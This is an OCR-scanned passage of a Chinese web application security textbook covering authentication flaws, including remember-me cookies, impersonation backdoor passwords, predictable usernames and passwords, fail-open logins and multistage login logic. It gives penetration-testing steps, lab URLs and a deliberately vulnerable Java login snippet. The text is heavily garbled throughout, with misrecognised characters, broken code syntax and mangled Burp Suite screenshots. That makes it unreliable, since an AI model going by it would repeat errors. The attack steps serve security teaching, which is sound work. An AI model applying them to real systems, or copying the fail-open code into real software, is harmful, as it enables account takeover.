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联 的 标识 符 , 不 经 验证 即 可 访问 他 们 的 账户 。 请 参阅 第 7 草 了 解 实施 这 种 攻击 的 有 头 技巧 。 

D 即便 cookie 中 你 存 的 用 于 重新 识别 用 户 的 信息 得 到 适当 你 护 〈 如 被 加 密 )， 以 防止 其 他 用 
户 对 此 进行 推 肤 或 猜测 ， 但 攻击 者 通过 器 站 点 脚本 之 类 的 漏洞 或 本 地 访问 用 户 的 计算 机 
依然 可 以 轻易 获得 这 些 信息 请 参阅 第 12 音 了解 相关 内 容 )。 







































































仿 burp suite professional 一 | 此 口 | 基 司 
burp intruder repeater window help 

target | proxy | spider scanner | intruder | repeater | sequencer decoder comparer options | alerts 

[+ [2 

go | host Imdsec.net follow redirect 
port |443 vl Use SSL 

| request 

| raw params headers hex 

SET /auth/219/Default.ashx HTTP/1.1 Tail 
IHost: mdsec.net 

ICookie: RememberUser=daf| 

” 

[ssllisssal las | OQ titalchies 
| response 

| raw | headers | hex | html | render | 

IHTTP/1.1 302 Found = 
Dates TH UD Seb 站 上 十 和 二 全 

Server: Microsoft-1IS/€.0 

[X-Powered-By: ASP.NET 

AspNet ion: 四 -二 总 

ILocation: /auth/219/Home.ashx 

Set-Cookie: Sessionld=AB82F5S564565D57BES405889097C72CCCé€; secure; HttpOnly 

IContent-Type: text/html; charset=utf-8 

IContent-Length; 136 

[<html><head> <t itle>Object moved</title></head> <hocdy> 

I<h2>0hject moved to <a href="/auth/219/Home .ashx">here</a>.</h?> 

I</ body></html> 

wi 

ss ls ls | 0 matches 
ldon length: 547 (164 millis) 














图 6-6 一 个 易 受 攻击 的 “ 记 住 我 ”功能 


渗透 测试 步 双 

















(1) 激活 所 有 “ 记 住 我 ”功能 ， 确 定 应 用 程序 是 否 完 全 “ 记 住 ”用 户 名 和 密码 ， 还 是 仪 记 
住 用 户 名 , 仍然 要 求 用 户 在 随后 的 访问 中 输入 密码 。 如 果 采 用 后 一 种 设置 ,该 功能 就 不 大 可 能 
存在 安全 源 润 。 

(2) 仔细 检查 应 用 程序 设 定 的 所 有 持久 性 cookie， 以 及 其 他 本 地 存储 机 制 中 的 持久 性 数据 ， 
如 IE 的 userData、Seilverlight 的 阳 离 存 储 、Flash 的 本 地 共 至 对 象 。 寻 找 其 中 保存 的 任何 明确 标 
识 出 用 户 或 明显 包含 可 预测 的 用 户 标识 符 的 数据 。 

(3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 仔 细 分 析 这 些 数据 ， 并 比较 “ 记 住 ” 
几 个 非常 类 似 的 用 户 和 名 或 密码 的 结 采 , 找到 任何 可 对 原始 数据 进行 逆 癌 工程 的 机 会 。 在 这 里 可 
使 用 将 在 第 7 章 摘 述 的 用 于 检测 会 话 令 牌 意义 和 模式 的 相同 技巧 。 

(4) 试图 修改 持久 性 cookie 的 内 容 , 并 设法 让 应 用 程序 确信 : 男 一 名 用 户 已 经 将 其 资料 保存 
在 你 的 计算 机 中 。 
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http://mdsec.net/auth/219/ 
http://mdsec.net/auth/224/ 
http://mdsec.net/auth/227/ 
http://mdsec.net/auth/229/ 
http://mdsec.net/auth/232/ 
http://mdsec.net/auth/236/ 
http://mdsec.net/auth/239/ 
http://mdsec.net/auth/245/ 


6.2.8 用 忆 伪 法 功能 


一 些 应 用 程序 允许 特权 用 户 伪 逆 成 其 他 用 户 ,， 以 在 该 用 户 的 权限 下 访问 数据 和 执行 操作 。 例 
如 , 一些 银行 应 用 程序 允许 服务 人 台 操 作 员 口头 验证 一 名 电话 用 户 , 然后 将 银行 的 应 用 程序 会 话 转 
换 到 该 用 户 的 权限 下 ， 以 为 其 提供 帮助 。 
伪 疙 功能 一 般 存在 各 种 设计 缺陷 。 
口 伪 疙 功能 可 以 通过 “隐藏 ”功能 的 形式 执行 ， 不 受 闸 规 访问 控制 管理 。 例 如 ， 任 何 知 道 
或 猜测 出 URL/admin/ImpersonateUser.jsp 的 人 都 能 够 利用 该 功能 伪装 成 任何 其 他 
用 户 ( 请 参阅 第 8 章 了 解 相 关内 容 )。 

口 当 判 定 用 户 是 否 进 行 伪 痰 时， 应 用 程序 可 能 会 信任 由 用 户 控 制 的 数据 。 例 如 ， 除 有 效 会 
话 令 牌 外 , 用 户 可 能 还 会 提交 一 个 指定 其 会 话 当前 所 使 用 的 账户 的 cookie。 攻 击 者 可 以 修 
改 这 个 信 ， 不 需 验证 即 可 通过 其 他 用 户 的 账户 访问 应 用 程序 ， 如 图 6-7 所 示 。 






































今 burp suite professicnal ee ES 到 =x 写作 
burp intruder repeater window help 








target | proxy | spider | scanner | intruder repeater | sequencer | decoder comparer | options | alerts 
| intercept options | history | 


a request to Mp limdsecnet443 有 16.50.129] 











| forward | drop 者 intercept is on | action 





raw raw | params | headers | hex 








GET /auth/272/Home .ashx HTTP/1.1 | 
Host: a .Net 

User— ER Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 
Firefo 6.8 


注 人 已 ELE text/html,application/xhtml+xml,application/xml;dq=0.9,*/*;d=0.8 
Accept-Language: en-gbh,en;d=0.5 
ee gzip, deflate 


Accept-Charset: ISO-8859-1,utf-8;dq=0.7,*;d=0.7 
Re -Alive: 115 
onnection: ke SH -alive 
Re ferer: https://mdsec.net/auth/272/ShowUsers.ashx 
Cookie: te SessionId=S5éCBC831E0037é6E28D48F58573E28FC4 
Cache-Control: Imax 一 ace=D 








ER 
Da 














3 2 a J 
i | De a | 
人 | 0 matches| 

















图 6-7 ”一 种 易 受 攻击 的 用 户 伪装 功能 
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口 如 采 应 用 程序 允许 管理 用 户 被 伪 半 ， 那 么 伪 痛 逻辑 中 存在 的 任何 缺陷 午 可 能 导致 垂 二 权 
限 提升 独 洞 。 攻 击 者 不 仅 可 以 访问 其 他 普通 用 户 的 数据 ， 甚 至 可 以 完全 控制 应 用 程序 。 
口 菏 种 伪装 功能 能 够 以 简单 “后 门 ”密码 的 形式 执行 ， 该 密 但 可 和 任何 用 户 名 一 起 回 标 准 
登录 页 面 提交 ， 以 作为 该 用 户 进行 验证 。 由 于 许多 原因 ， 这 种 设计 非常 危险 ， 但 攻击 者 
所 获得 的 最 大 好 处 是 : 他 们 可 在 实施 标准 攻击 〈 如 对 登录 机 制 进行 蛮 力 攻击 ) 的 过 程 中 
发 现 这 个 密码 。 如 来 后 门 密码 在 用 户 的 丰 实 密码 前 得 到 匹配 ， 那 么 攻击 者 就 可 能 发 现 后 
门 密码 功能 ， 从 而 访问 每 一 名 用 户 的 账户 。 同样 , 一 次 蛮 力 攻击 可 能 导致 两 个 不 同 的 “和 触 

尽 ”， 因 而 指 示 后 门窗 码 ， 如 图 6-8 所 不 。 



































3* intruder attack 4 王宫 | 是 器 | 区 到 


attack save columns 
Filter: showing all tems 


| results | target | positions | payloads | options 


















reguest | _ payload |_ status | efror limeo | length | comment 

5318 lhendrix1 302 liad 剧 |566 全 
2197 lletmein 1302 [El EE a 国 
0 | 1200 | 加 | lil |1610 |baseline request | | 

1 IAaaaaa 1200 Lad | | |1610 

2 _Abcdef 1200 | WW | Wl |1610 

3 IAbcdefg I200 | iul | lwl | 本 各 

2 IAction I200 | i | kil |1610 

5 IAdidas 200 | lml | 11610 

6 Admin i200 | i | 大 |1630 

了 Adminis:rative 200 | ll | i |163 





| request | response | 





[ raw headers | hex | html | render 





[HTTP/1.1 302 Found 

Connection: close 

Date: Thus :10 Feb 2011 -17:37:14 GHT | 
Server: ‘Microsoft—-LIS/6.0 EE 
MicrosoftOfficeWebserver: 5.0 Pub | 


Powered-B P.NET 
AspNet 本 
Location: /auth/290/Home .ashx2?acdmincwEerride=trUE 
Set-Cookie: sessionIld=]FBBE452ADE44A1IDASCEBSCBDG47AF 4A; secure; 


















































图 6-8 一 次 密码 猜测 攻击 出 现 两 个 “ 触 点 ”， 说 明 应 用 程序 使 用 后 门 密 码 


渗透 测试 步 又 








(1) 确定 应 用 程序 中 的 所 有 伪装 功能 。 即 使 公布 的 内 容 中 没有 明确 的 伪装 功能 链接 ， 应 用 
程序 仍然 可 能 实施 这 种 功能 ( 请 参阅 第 4 草 了 解 相关 内 容 ) 。 

(2) 尝试 使 用 伪装 功能 下 接 伪 装 成 其 他 用 户 。 

(3) 设法 操纵 任何 由 伪 艾 功能 处 理 的 用 户 提交 的 数据 ， 答 试 伪 次 成 其 他 用 户 。 特 别 留意 任 











何不 通过 正常 登录 页 面 提交 用 户 名 的 情况 。 

(4) 如 采 能 够 成 功利 用 伪 竣 功能 ， 答 试 伪 交 成 任何 已 知 的 或 猜测 出 的 管理 用 户 ， 以 提升 用 
户 权限 。 

(5) 实施 密码 猜测 攻击 请 参阅 6.2.3 市 ) 时 ， 查 明 是 否 有 用 户 使 用 多 个 有 效 密 码 ， 或 者 某 
个 特殊 的 密码 是 否 与 几 个 用 户 名 匹配 。 为 外 ,用 在 蛮 力 攻击 中 获得 的 证 书 以 许多 不 同 的 用 户 登 
录 ， 检 得 是 否 一 切 正常 。 特 别 注意 任何 “以 X 滞 录 ” 的 状态 消息 。 
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尝试 访问 
http://mdsec.net/auth/272/ 
http://mdsec.net/auth/290/ 


6.2.9 证 书 确 认 不 完善 


精心 说 计 的 验证 机 制 强 制 要求 密 码 满足 各 种 要 求 ， 如 最 小 密码 长 度 和 同时 使 用 大 小 写字 符 。 
相应 地 , 一 些 设计 不 佳 的 验证 机 制 不 仅 没有 强制 执行 这 些 最 佳 实践 , 而 且 对 用 户 避 守 这 些 要 求 的 
愿望 置之不理 。 

例如 ， 一 些 应 用 程序 稚 短 密码 ， 只 确认 前 ?个 字符 ;一 些 应 用 程序 并 不 对 密码 进行 大 小 与 检 
查 ; 一 些 应 用 程序 在 检查 密码 之 前 删除 不 笛 用 的 字符 《有 时 以 执行 输入 确认 为 信 口 )。 最 近 , 一 
些 相 当 有 名 的 应 用 程序 都 被 确认 具有 此 类 行为 , 一 些 好 奇 用 户 的 试验 和 错误 致使 人 们 发 现 了 这 一 
问题 。 

以 上 这 些 密码 确认 限制 可 显 考 减少 可 能 的 密码 数量 。 通 过 实验 , 渗透 测试 员 可 以 判定 一 个 密 
人 码 是 否 得 到 完全 确认 ，, 或 者 菏 个 限制 是 否 生 效 。 然后 束 可 以 针对 登录 机 制 的 目 动 攻击 方法 进行 调 
整 ， 删 除 不 必要 的 测试 ， 大 量 减少 攻破 用 户 账户 所 需 提 交 的 请 求 的 数量 。 


















































ET 


(1) 使 用 一 个 现 有 的 账户 ， 尝 试用 密码 的 各 种 变化 形式 进行 登录 : 删除 最 后 一 个 字符 、 改 

















变 字 和 从 大 小 写 、 删 除 任何 特殊 排版 的 字符 。 如 果 其 中 一 些 尝 试 取得 成 功 ， 继续 实验 过 程 ， 演 试 
了 解 完整 的 证 书 确认 过 程 。 
(2) 利用 得 到 的 所 有 绪 朱 调整 日 动 密码 猜测 攻击 ， 删 除 多 余 的 测试 ， 提 高 成 功 的 几率 。 





党 试 访 问 


http://mdsec.net/auth/293/ 


6.2.10” 非 唯一 性 用 记名 


一 些 文 持 晶 我 注册 的 应 用 程序 允许 用 户 指 定 他 们 上 自己 的 用 户 名 , 而 且 并 不 强制 要 求 用 户 使 用 
唯一 的 用 户 名 。 昌 然 这 种 应 用 程序 极其 少见 ， 但 我 们 还 是 见 到 过 在 干 这 类 应 用 程序 。 
由 于 两 方面 的 原因 ， 这 种 设计 存在 一 些 缺陷 。 
口 在 注册 阶段 或 随后 修改 密码 的 过 程 中 ， 共 至 同一 个 用 户 名 的 两 个 用 户 可 能 碰巧 选择 相同 
的 密码 。 如 采 出 现 这 种 情况 ， 应 用 程序 要 么 拒绝 第 二 名 用 户 选 择 的 密码 ， 要 么 允许 两 个 
账户 使 用 相同 的 证 书 。 如 果 属 于 前 者 ， 应 用 程序 将 会 同一 名 用 户 汇 露 男 一 名 用 户 的 证 书 ; 
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如 有 果 属 于 后 者 ， 其 中 一 名 用 户 登 录 后 会 访问 为 一 名 用 户 的 账户 。 
口 即使 由 于 登录 失败 符 试 次 数 方面 的 限制 ， 在 其 他 地 方 不 可 能 实施 这 种 攻击 ， 攻 击 者 仍然 
可 以 利用 这 种 行为 成 功 实施 蛋 力 攻击 。 攻 击 者 可 以 使 用 不 同 的 密码 ， 多 次 用 一 个 特殊 的 
用 户 名 注册 ， 同 时 监控 说 明 使 用 该 用 户 名 和 密码 的 账户 已 经 存在 的 不 同 响应 。 攻 击 者 不 
需 以 目标 用 户 进行 任何 一 次 登录 答 试 ， 即 可 获取 该 用 户 的 密码 。 
设计 存在 缺陷 的 日 我 注册 功能 还 可 能 造成 用 户 枚 举 漏 洞 。 如 琳 应 用 程序 荣 止 使 用 相同 的 用 户 
名 ,那么 攻击 者 可 以 注册 大 量 和 常见 的 用 户 名 ， 从 而 确定 遭 到 拒绝 的 现 有 用 户 名 。 









































渗透 测试 步 双 


(1) 如 果 应 用 程序 允许 日 我 注册 ， 演 试用 不 同 的 密码 两 次 注册 同一 个 用 户 名 。 











(2) 如 来 应 用 程序 阻止 第 二 次 注册 企图 ， 也 可 以 利用 这 种 行为 枚 举 现 有 的 用 户 名 ， 虽然 在 
主 登 录 页 面 或 其 他 地 方 不 可 能 这 样 做 。 用 一 组 常见 的 用 户 名 进行 多 次 注册 演 试 , 设法 确定 被 应 
用 程序 阻止 的 已 注册 用 户 名 。 

(3) 如 来 可 成 功 注册 完全 相同 的 用 户 名 ， 尝 试用 相同 的 密码 注册 两 个 相同 的 用 户 名 ， 以 此 
确定 应 用 程序 的 行为 。 

(a) 如 宁 以 上 做 法 得 到 错误 消息 ， 也 可 以 利用 这 种 行为 实施 一 次 亦 力 攻击 ， 虽 然 在 主 登 
录 页 面 不 可 能 实施 这 种 攻击 。 针 对 一 个 枚 举 或 猜测 出 的 用 户 名 发 动 攻击 ， 答 试用 一 
组 常用 密码 多 次 注册 这 个 用 户 名 。 如 来 应 用 程序 拒绝 条 个 特殊 的 密码 ， 束 可 以 发 现 
目标 账户 的 现 有 密码 。 

(b) 如 果 没 有 得 到 错误 消息 ， 使 用 指定 的 证 书 登录 ， 看 看 出 现 什么 结果 。 可 能 需要 注 
册 几 个 用 户 ， 修 改 每 个 账户 保存 的 不 同 数据 ， 以 确定 这 种 行为 是 否 可 用 于 未 授权 
访问 其 他 用 户 的 账户 。 























6.2.11 可 预测 的 用 户 名 


一 些 应 用 程序 根据 某 种 可 以 预测 的 顺序 ( 如 eust5331、cust5332 ) 自动 生成 账户 用 户 名 。 如 
果 应 用 程序 以 这 种 方式 运转 , 弄 清 了 用 户 名 顺序 的 攻击 者 就 可 以 很 快 获得 全 部 有 效用 户 名 , 以 此 
作为 后 续 攻 击 的 基础 。 与 依赖 不 断 提交 由 词汇 驱动 请 求 的 枚 举 方法 不 同 , 这 种 确定 用 户 名 的 方法 
不 需 实施 人 侵 ， 也 很 少 给 应 用 程序 造成 干扰 。 
































渗透 测试 步 双 


(1) 如 采用 户 名 由 应 用 程序 生成 ， 设 法 获得 几 个 连续 的 用 户 名 ， 看 能 否 从 中 看 出 任何 顺序 

















或 模式 。 

(2) 如 果 存 在 某 种 顺序 或 模式 ， 向 后 推断 列 出 所 有 可 能 的 有 效用 户 和 名。 这 种 方法 可 作为 需 
要 有 效用 户 名 的 登录 蜜 力 攻击 和 其 他 攻击 的 基础 ， 如 利用 访问 控制 漏洞 ( 请 参阅 第 8 章 了 解 相 
关内 容 ) 。 
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党 试 访 问 


http://mdsec.net/auth/169/ 


6.2.12 ”可 预测 的 初始 密码 


一 些 应 用 程序 一 次 性 或 大 批量 创建 用 户 , 并 自动 指定 初始 密码 , 然后 以 某 种 方式 将 密码 分 配 
给 所 有 用 户 。 这 种 生成 密码 的 方式 可 让 攻击 者 能 够 预测 其 他 应 用 程序 用 户 的 密码 。 基 于 内 联网 的 
企业 应 用 程序 党 第 存在 这 种 犹 洞 。 例 如 , 应 用 程序 为 每 位 雇员 创建 一 个 账户 ,并 回 其 发 送 一 份 打 
印 好 的 密码 通知 。 

如 果 所 有 用 户 收 到 相同 的 密码 , 或 者 根据 其 用 户 名 或 工作 职能 创建 的 密码 , 这 种 密码 最 容易 
被 攻破 。 男 外 ， 生 成 的 密码 可 能 包含 菏 种 顺 厚 ,攻击 者 查看 少数 几 个 初始 密码 样本 即 可 确定 或 猪 
测 出 其 他 用 户 的 密码 。 






































渗透 测试 步 又 


(1) 如 来 密码 由 应 用 程序 生成 , 设法 获得 儿 个 连续 的 密码 ,看 能 否 从 中 看 出 任何 顺序 或 模式 。 




















(2) 如 条 存 在 茶 种 顺序 或 模式 ， 根 据 这 种 模 陈 推 有 新， 获取 其 他 应 用 程序 用 户 的 密码 。 

(3) 如 于 密码 呈现 出 一 种 可 能 与 用 户 名 相 联系 的 模式 ， 可 以 设法 使 用 已 知 或 猜测 出 的 用 户 
名 与 相应 推断 出 的 密码 进行 登录 。 

(4) 其 他 情况 下 ， 可 以 使 用 推 呆 出 的 密码 列表 作为 利用 一 组 枚 举 出 的 用 户 名 或 第 见 用 户 名 
实施 蛋 力 攻击 的 基础 。 


党 试 访 问 


http://mdsec.net/auth/172/ 

















6.2.13 ”证 书 分 配 不 安全 


许多 应 用 程序 并 不 在 用 户 与 应 用 程序 正常 交互 的 过 程 中 分 配 新 建 账户 的 证 书 ( 如 通过 邮寄 或 
电子 邮件 )。 有 时 ,采用 这 种 分 配方 式 主要 出 于 安全 考虑 ， 例 如 ， 确 保 用 户 提 供 的 邮寄 或 电子 邮 
件 地 址 属于 其 本 人 。 

这 种 分 配方 式 有 时 会 市 来 安全 风险 。 例 如 ， 如 条 分 配 证 书 的 邮件 中 同时 包含 用 户 名 和 密码 ， 
没有 给 邮件 设置 使 用 时 间 限 制 , 没有 要 求 用 户 在 第 一 次 登录 时 修改 密码 , 那么 , 大 多 数 甚 至 是 绝 
大 部 分 应 用 程序 用 户 孝 不 会 修改 初始 证 书 , 并 且 将 收 到 的 邮件 保存 很 长 一 段 时 间 , 而 未 授权 方 有 
可 能 在 此 期 间 访问 这 些 分 配 证 书 的 邮件 。 

有 时 应 用 程序 并 不 分 配 证 书 ， 而 是 传送 一 个 “账户 激活 ”URL， 用 户 通 过 它 设置 日 己 的 初始 
密码 。 如 末 发 送 给 连续 用 户 的 URL 表 现 出 某 种 顺序 , 攻击 者 就 可 以 通过 注册 几 个 紧密 相连 的 用 户 
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确定 这 种 顺序 ， 以 此 推断 出 发 送 给 最 近 与 后 续 用 户 的 激活 URL。 

某 些 Web 应 用 程序 表现 的 一 种 相关 行为 是 ， 人 允许 新 用 户 以 看 似 安 全 的 方式 注册 账户 ， 然 后 回 
每 个 新 用 户 发 送 一 封包 含 其 完整 的 登录 证 书 的 欢迎 电子 邮件 。 最 久 料 的 情况 是 , 具有 安全 意识 的 
用 户 决 定 立 即 修改 可 能 已 被 攻破 的 密码 , 但 随后 又 收 到 一 封 电 子 邮 件 , 其 中 包含 “以 备 日 后 参考 ” 
的 新 密码 。 这 种 行为 相当 奇怪 , 并且 完全 没有 必要 ， 因 此 ,我们 强烈 建议 用 户 停止 使 用 表现 出 此 
类 行为 的 Web 应 用 程序 。 
































渗透 测试 步 双 


(1) 获得 一 个 新 账户 。 如 果 应 用 程序 并 不 要 求 在 注册 阶段 设置 所 有 证 书 ， 弄 清 应 用 程序 如 








何 回 新 用 户 分 配 证 书 。 

(2) 如 果 应 用 程序 使 用 账户 激活 URL， 设 法 注册 几 个 紧密 相连 的 新 账户 ,确定 收 到 的 URL 
中 的 任何 顺序 。 如 条 确定 茶 种 模式 ， 答 试 预测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 激活 URL, 洋 
试 使 用 这 些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL， 看 看 应 用 程序 是 否 允 许 这 样 做 。 如 果 遭 到 拒绝 ， 
尝试 在 重复 使 用 URL 之 前 锁定 目标 账户 ， 看 看 现在 这 种 方法 是 否 可 行 。 
































6.3 验证 机 制 执行 缺陷 


由 于 在 执行 过 程 中 存在 错误 ,即使 精心 设计 的 验证 机 制 也 可 能 非常 不 安全 。 这 些 错误 可 能 
致 信息 泄露 、 完 全 避 开 登录 ,或 者 使 验证 机 制 的 总 体 安全 弱化 。 与 保密 性 不 强 的 密码 和 可 被 蛮 力 
攻击 之 类 的 设计 缺陷 相 比 ,执行 缺陷 往往 更 加 细微 ,更 难以 发 现 。 由 于 大 量 威胁 模型 和 渗透 测试 
可能 已 经 发 现 了 最 为 注 章 安全 的 应 用 程序 中 的 任何 明显 的 执行 缺陷 ,针对 这 类 缺陷 实施 攻击 通常 
会 取得 更 大 的 成 来 。 我 们 曾 在 茶 大 型 银行 所 采用 的 Web 应 用 程序 中 发 现 以 下 所 述 的 执行 缺陷 。 


6.3.1 故障 开放 登录 机 制 


故障 开放 逻辑 是 一 种 逻辑 缺陷 《将 在 第 11 草 详细 摘 述 )， 如 来 验证 机 制 中 出 现 这 种 缺陷 ， 束 
会 造成 十 分 严重 的 后 来 。 

下 面 是 一 个 精心 设计 的 故障 开放 登录 机 制 实例 。 如 采 由 于 攻 种 原因 ,调用 db.getUser () 广 
生 异 沼 ( 例如 ， 因 为 用 户 的 请 求 中 没有 用 户 名 或 密码 参数 而 出 现 空 指针 异常 )， 用 户 仍 然 可 以 成 
功 登 录 。 昌 然 产生 的 会 话 可 能 并 不 属于 有 茶 个 特殊 的 用 户 ， 因 此 无 法 执行 其 全 部 功能 , 但 攻击 者 仍 
然 可 以 通过 这 种 方法 访问 一 些 敏感 数据 或 功能 。 

public Response checkLogin(Session session) { 


try 
String uname = session.getParameter ("username"); 
























































String passwd = sessijon.getPparameter ("password").; 


0.3 ”验证 机 制 执 行 缺 陷 135 


User user = db.getUser (uname, passwd).， 
if (user == null) { 
// 无 效 证 书 


session.setMessage ("Login failed. "1) 
return doLogin{session).:; 
} 
) 


Catch (Exception e) 1{} 


// 有 效用 户 
Session.setMessage{'"Login successful. 1 ) 


return doMainMenu{session}.: 


} 

实际 上 ,我们 不 能 指望 这 样 的 代码 通过 即使 是 最 简单 的 安全 审查 。 但 是 , 在 更 复杂 的 机 制 中 
很 可 能 存在 概念 相同 的 缺陷 。 这 些 机 制 会 产生 大 量 分 层 方式 调用 , 可 能 会 出 现 许 多 海 在 的 错误 并 
在 不 同 的 位 置 对 它们 进行 处 理 ， 基 中 更 复杂 的 确认 逻辑 可 能 需要 维护 重要 的 登录 进展 状态 。 





























渗透 测试 步 又 


(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 拦截 代理 服务 需 记 录 提 交 的 每 





一 份 数 据 、 收 到 的 每 一 个 啊 应 。 
(2) 多 次 重复 登录 过 程 ， 以 非常 规 方式 修改 提交 的 数据 。 例 如 ， 对 于 客户 端 传 送 的 每 个 请 
求 参 数 或 cookie: 
(a) 提交 一 个 空 字符 串 信 ; 
(b) 完全 删除 名 / 值 对 ; 
(c) 提交 非常 长 和 非常 短 的 值 ; 
(d) 提交 字符 串 代 蔡 数字 或 相反 ; 
(e) 以 相同 和 不 同 的 值 ， 多 次 提交 同一 个 数据 项 。 
(3) 仔细 检查 应 用 程序 对 提交 的 每 个 畸形 请 求 的 啊 应 ， 确 定 任 何不 同 于 基本 情况 的 差异 。 
(4) 根据 这 些 观 察 结果 调整 测试 过 程 。 如 果 某 个 修改 造成 行为 改变 ， 设 法 将 这 个 修改 与 其 
他 更 改组 合 在 一 起 ， 使 应 用 程序 的 逻辑 达到 最 大 限度 。 

















党 试 访 问 


http://mdsec.net/auth/300/ 


6.3.2 多 阶段 登录 机 制 中 的 缺陷 


一 些 应 用 程序 使 用 精心 设计 的 多 阶段 登录 机 制 ， 例 如 : 
口 输入 用 户 名 和 和 密 公 ; 
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口 啊 应 一 个 质询 ， 答 案 是 PIN 中 的 特殊 数字 或 一 个 值得 纪念 的 词 ; 

口 提交 在 不 断 变化 的 物理 令 牌 上 显示 的 某 个 值 。 

多 阶段 登录 机 制 旧 在 提高 基于 用 户 名 和 密 但 的 傈 单 登录 模型 的 安全 性 。 通 向 ,多 阶段 登录 机 
制 首 先 要 求 用 户 通 过 用 户 和 名 或 类 似 数 据 项 确认 目 己 的 吴 份 ; 随后 , 登录 阶段 再 执行 各 种 验证 检查 。 
这 种 机 制 第 第 存在 安全 漏洞 ， 特 别 是 各 种 逻辑 缺陷 ( 请 参阅 第 11 划 了解 相关 内 容 )。 

















© 错误 观点 ”人 们 常常 认为 多 阶段 登录 机 制 比 标准 的 用 户 名 /密码 验证 的 安全 漏洞 更 少 。 
这 种 看 法 是 错误 的 。 执行 多 次 验证 检查 可 能 会 显著 提高 登录 机 制 的 安全 性 ,但 相应 地 ， 


这 个 过 程 也 存在 更 多 的 执行 缺陷 。 如 果 一 个 多 阶段 登录 机 制 存在 多 个 执行 缺陷 ， 它 其 
至 还 没有 基于 用 户 名 和 密码 的 正常 登录 实 全 。 





在 执行 过 程 中 , 一 些 多 阶段 登录 机 制 对 用 户 与 早先 阶段 的 交互 做 出 浴 在 不 安全 的 假设 , 如 下 
所 未 。 

口 应 用 程序 可 能 认为 访问 第 三 阶段 的 用 户 已 经 完成 第 一 、 二 阶段 的 验证 。 因 此 ， 它 可 能 
许 直 接 由 第 一 阶段 进入 第 三 阶段 并 且 提 供 正 确证 书 的 攻击 者 通过 验证 ， 使 仅 拥 有 部 分 正 
毅 登 录 所 需 的 各 种 证 书 的 攻击 者 能 够 成 功 登 录 。 

口 应 用 程序 可 能 会 信任 由 第 二 阶段 处 理 的 一 些 数据 ， 因 为 这 些 数据 已 经 在 第 一 阶段 得 到 确 
认 。 但是， 攻击 者 能 够 在 第 二 阶段 操控 这 些 数据 ， 提 供 一 个 不 同 于 第 一 阶段 的 值 。 例 如 ， 
在 第 一 阶段 ， 应 用 程序 会 判定 用 户 的 账户 是 否 已 经 过 期 、 被 锁定 或 者 属于 管理 用 户 ， 或 
者 是 否 需要 完成 第 二 阶段 以 外 的 其 他 登录 阶段 。 如 宁 攻 击 者 能 在 不 同 登录 阶段 的 转换 过 
程 中 干扰 这 些 标记 ， 他 们 就 可 以 更 改 应 用 程序 的 行为 ， 让 他 们 只 需 部 分 证 书 即 可 通过 验 
证 ， 或 者 提升 其 权限 。 

口 应 用 程序 可 能 认为 每 个 阶段 的 用 户 号 份 不 会 发 生变 化 ， 因 此 ， 它 并 不 在 每 个 阶段 明确 确 
认 用 户 号 份 。 例 如 ， 第 一 阶段 可 能 逢 要 提交 一 个 有 效 的 用 户 名 和 和 密码， 第 二 阶段 需要 香 
新 提交 用 户 名 ( 此 时 保存 在 隐藏 表单 字段 中 ) 和 不 断 变 化 的 物理 令 脾 上 的 一 个 值 。 如 来 
攻击 者 在 每 个 阶段 提交 有 效 的 数据 对 ， 但 这 些 数 据 属 于 两 个 不 同 的 用 户 ， 那 么 应 用 程序 
可 能 会 允许 该 用 户 通过 验证 ， 认 为 他 是 两 名 用 户 中 的 任意 一 名 用 户 。 这 驶 允许 拥有 目 己 
物理 令 牌 并 发 现 其 他 用 户 密 码 的 攻击 者 能 够 以 该 用 户 的 号 份 登录 (反之 亦 然 )。 里 然 不 对 
其 他 信息 加 以 利用 ， 攻 击 者 无 法 完全 攻破 登录 机 制 ， 但 它 的 总 体 安全 状态 已 严重 削弱 ， 
应 用 程序 为 执行 二 元 机 制 所 投入 的 大 量 开 文 和 努力 并 未 取得 预期 的 效 宋 。 

































































渗透 测试 步骤 

(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 拦截 代理 服务 需 记 录 回 应 用 程 
序 提交 的 每 一 份 数 据 。 

(2) 确定 各 个 不 同 登录 阶段 以 及 在 每 个 阶段 收集 到 的 数据 。 确 定 是 否 不 止 一 次 收 到 茶 条 信 





0.3 ”验证 机 制 执 行 缺 陷 137 


上 县， 或 者 是 否 有 信息 被 返回 给 客户 端 ， 并 通过 隐藏 表单 字段 、cookie 或 者 预先 设置 的 URL 人 参数 
重新 提交 ( 请 参阅 第 5 音 了 解 相关 内 容 ) 。 

(3) 使 用 各 种 畸形 请 求 多 次 重复 登录 过 程 : 

(a) 答 试 按 不 同 的 顺序 完成 登录 步 又 ; 

(b) 尝试 下 接 进 入 任何 特定 的 阶段 ， 从 那里 继续 登录 ; 

(c) 尝试 省 略 每 个 阶段 并 从 下 一 阶段 继续 登录 ; 

(d) 运用 想象 力 ， 想 出 其 他 开发 者 无 法 预料 的 方式 访问 不 同 的 登录 阶段 。 

(4) 如 有 果 有 数据 不 止 提交 一 次 ， 笠 试 在 为 一 个 阶段 提交 一 个 不 同 的 值 ， 看 看 是 否 仍 然 能 够 
成 功 登 录 。 有 些 提交 数据 可 能 是 多 余 的 , 实际 上 并 不 由 应 用 程序 处 理 。 有 些 数 据 在 某 个 阶段 得 
到 确认 ,随后 就 被 应 用 程序 所 信任 。 在 这 种 情况 下 ， 和 洋 试 在 一 个 阶段 提供 一 名 用 户 的 证 书 , 然 
后 在 下 一 阶段 转换 成 由 为 一 名 用 户 进 行 验证 ,应 用 程序 可 能 在 几 个 阶段 都 对 同一 个 数据 进行 确 
认 , 但 执行 不 同 的 检查 。 在 这 种 情况 下 ， 演 试 在 第 一 个 阶段 提供 ( 例如) 一 名 用 户 的 用 户 名 和 
密码 ， 然 后 在 第 二 个 阶段 提供 为 一 名 用 户 的 用 户 名 和 PIN 号 人 码 。 

(5) 特别 注意 任何 通过 客户 问 传 送 、 并 不 由 用 户 和 直接 输 入 的 数据 。 应 用 程序 可 能 使 用 它们 
保存 登录 进展 状态 信息 ， 并 且 信 任 这 些 数据 。 例 如 ， 如 果 第 三 个 阶段 的 请 求 中 包含 参数 
